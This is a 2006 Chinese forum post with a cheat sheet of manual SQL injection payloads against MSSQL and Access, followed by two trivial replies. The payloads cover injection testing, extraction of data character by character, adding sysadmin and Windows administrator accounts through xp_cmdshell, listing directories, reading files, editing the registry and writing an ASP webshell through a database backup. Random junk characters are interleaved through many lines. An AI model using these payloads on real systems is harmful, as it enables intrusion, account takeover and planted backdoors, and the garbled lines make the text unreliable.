社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3307阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 p)Q5fh0-  
  2.初步判断是否是mssql ;and user>0 Ux^ue9  
{I0!q"sF  
  3.注入参数是字符'and [查询条件] and ''=' &.2% p  
5G'2 Wby'#  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' a(fiW%eFb  
}+`,AC`RM  
  5.判断数据库系统 Q: -&  
46 0/eW\  
  ;and (select count(*) from sysobjects)>0 mssql gGCr~.5  
d^~yUk  
  ;and (select count(*) from msysobjects)>0 access Rq2bj_j  
R86i2',  
nt&% sM-X  
`%Kj+^|DS  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 yRQ1Szbjli  
qh}+b^Wi  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Z;+;_Cw  
LdiNXyyzet  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 O+'k4  
n87Uf$  
  9.(1)猜字段的ascii值(access) s+ *LVfau  
mV"F<G; H  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 v#g:]T  
2\64~a^  
  (2)猜字段的ascii值(mssql) RFe># o  
M/F <W!  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 'Q]Wk75  
@HI@PZ>  
  10.测试权限结构(mssql) &uaSp, L  
|Om][z  
hqHk,#  
uj%]+Llxv  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- KDP& I J  
s^)(.e_  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--  %>zG;4  
Oi C|~8  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- N1y,~Z  
T$FKn  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Ai 8+U)  
.3XSF$;  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 07(LLhk@d  
{9P(U\]e]k  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- $Sm iN'7;  
~k@{b&  
  ;and 1=(select IS_MEMBER('db_owner'));--  iSX:H;  
ZV5IZ&V!  
tycVcr \(  
1 Cz}|#U  
  11.添加mssql和系统的帐户 eUu<q/FUMj  
X H!n{Of  
  ;exec master.dbo.sp_addlogin username;-- d{WOO)j  
  ;exec master.dbo.sp_password null,username,password;-- $mq+/|bn  
MfI+o<{r  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- SFP?ND+7  
*fyaAv  
  ;exec master.dbo.xp_cmdshell 'net user username password $i3`cX)g  
 bFA lC  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- y~t e!C  
]-heG'y]{  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- S n~P1C  
9zBt a  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ]5j>O^c<  
}HbUB$5  
$_a/!)bP  
Xk/:a}-l  
  12.(1)遍历目录 j:48l[;ed  
mMu+MXTk<  
  ;create table dirs(paths varchar(100), id int) IK4(r /  
F2n4#b  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' 3$_- 0>  
#w^Ot*{!N  
  ;and (select top 1 paths from dirs)>0 _-v$fDrz  
 SBi4i;qD  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) (o\D=!a  
1]8Hpd  
b'/:e#F  
#~|esr/wf  
  (2)遍历目录 Mac:E__G  
YWANBM(v+  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- p NQ@aJ  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 &=Y%4 vq  
t08[3Q&  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 aiw4J  
jW| ,5,43  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?^8.Sa{  
0+_;6  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 4q@[k: '  
I.2>d_^<  
8y?q)y9h  
_$}@hD*R~  
  13.mssql中的存储过程 0@&;JMh6<  
^d9o \  
  xp_regenumvalues 注册表根键, 子键 !.q#X^@>L  
wv%UsfD  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 0*uJS`se6Z  
^zG!Z:E  
  xp_regread 根键,子键,键值名 IMy!8$\u  
m[N&UM#  
  ;exec xp_regread q.ppYXJUXi  
\w$e|[~  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 !83 N#Y_Mz  
UrS%t>6k  
  xp_regwrite 根键,子键, 值名, 值类型, 值 ,mD$h?g  
PDh!B _+  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 2:[G4  
Sc]h^B^7  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @Js@\)P79  
FT gt$I  
  xp_regdeletevalue 根键,子键,值名  )Z:maz  
MLDAr dvK  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Zc9S[ivq  
eQ#"-i  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 LXc;`]  
,;=is.h9  
<z wI@i  
 <j_  
  14.mssql的backup创建webshell gX5.u9%C\  
[s-!t E3-  
  use model bU4\Yu   
1eS@ihkP  
  create table cmd(str image); Ei@al>.\  
|'L$ogt6  
  insert into cmd(str) values (''); 'EU|w,GL}  
8PRB_ny  
  backup database model to disk='c:\l.asp'; iSMVV<7  
B@vup {Kg  
!ZN"(0#qz  
'sjks sy.3  
  15.mssql内置函数 3"6-X_  
BQ!_i*14+  
  ;and (select @@version)>0 获得Windows的版本号 61z^(F$@  
z8PV&o  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa **n109R  
Q>/[*(.Wd  
  ;and (select user_name())>0 爆当前系统的连接用户 %BkPkQA  
C9`x"$  
  ;and (select db_name())>0 得到当前连接的数据库 5PKdMEK|q  
E{B40E~4  
=XUt?5  
q0_Pl*  
  16.简洁的webshell wH qbTA  
SYv5{bff =  
  use model tlmfDQD  
`?(9Bl  
  create table cmd(str image); 04#r'UIF  
+]# p m9  
  insert into cmd(str) values (''); e]l.m!,r  
(ZK(ODn)i  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八